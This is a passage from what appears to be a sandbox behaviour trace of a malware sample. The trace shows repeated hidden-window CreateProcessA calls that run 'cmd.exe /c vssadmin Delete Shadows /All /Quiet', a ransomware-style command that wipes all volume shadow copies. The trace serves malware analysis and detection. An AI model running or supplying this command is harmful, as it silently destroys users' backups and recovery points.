lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.357] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.357] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.358] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.358] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.359] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.359] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.359] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.359] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.359] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.359] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.360] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.360] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.360] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.360] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.360] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.360] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.361] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.361] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.361] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.361] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.361] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.361] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.361] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.362] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.362] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.362] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.362] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.362] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.362] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.363] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.363] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.363] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, 